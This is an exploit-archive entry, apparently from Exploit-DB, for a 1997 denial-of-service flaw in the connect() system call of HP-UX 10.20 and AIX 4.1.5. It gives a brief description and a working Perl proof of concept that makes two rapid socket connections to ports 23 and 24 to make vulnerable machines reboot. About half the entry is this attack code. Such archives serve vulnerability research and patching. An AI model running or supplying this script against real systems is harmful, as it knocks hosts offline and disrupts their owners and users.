HP HP-UX 10.20 / IBM AIX 4.1.5 - 'connect()' Denial of Service
Author: Cahya Wirawan
type: dos
platform: hp-ux
port:
date_added: 1997-03-05
date_updated: 2012-06-18
verified: 1
codes: CVE-1999-1408;OSVDB-8022
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/352/info
Certain versions of AIX and HP/UX contained a bug in the way the OS handled the connect system call. The connect call is used to initiate a connection on a socket. Because of the flaw in the handling code under AIX certain versions will reboot when given two connects, one to a fixed port (a number of different ports were found to trigger this behaviour) and then another random port connection immediately thereafter.
#!/usr/local/bin/perl5
use Socket;
socket (SOCK,AF_INET,SOCK_STREAM,0);
$iaddr = inet_aton('localhost');
$paddr = sockaddr_in('23',$iaddr);
connect SOCK,$paddr;
shutdown SOCK,2;
$paddr = sockaddr_in('24',$iaddr);
connect SOCK,$paddr;